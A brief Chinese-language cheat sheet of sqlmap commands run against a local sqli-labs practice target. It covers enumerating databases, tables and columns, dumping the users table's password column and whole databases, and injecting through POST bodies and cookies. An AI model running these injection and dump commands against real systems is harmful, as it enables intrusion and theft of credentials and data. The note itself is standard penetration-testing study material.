1、常用指令
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” --dbs
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” --current-db
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” -D security --tables
sqlmap -u “http://127.0.0.1/sqli/Less-1/?id=1” -D security -T users --columns
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users -C password --dump
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --dump-all
sqlmap -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --dump-all
输出指定数据库指定表中的全部数据:
sqlmap -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T user --dump-all
2、其他
【1】post注入
- sqlmap -r “1.txt” -p user --dbs
- sqlmap -u “http://127.0.0.1/sqli-labs/Less-1” --forms
- sqlmap -u “http://127.0.0.1/sqli-labs/Less-1” --data “user=1&passwd=1”
【2】cookie注入
- sqlmap -r “1.txt” --cookie “uname=admin” --level 2
- sqlmap -u “http://127.0.0.1/sql/Less-20/” --cookie=“uname=admin” --level 2
- sqlmap -r “1.txt” -p cookie
3、细节
【1】指令选项大小写问题
例如–dbs不能写成–DBS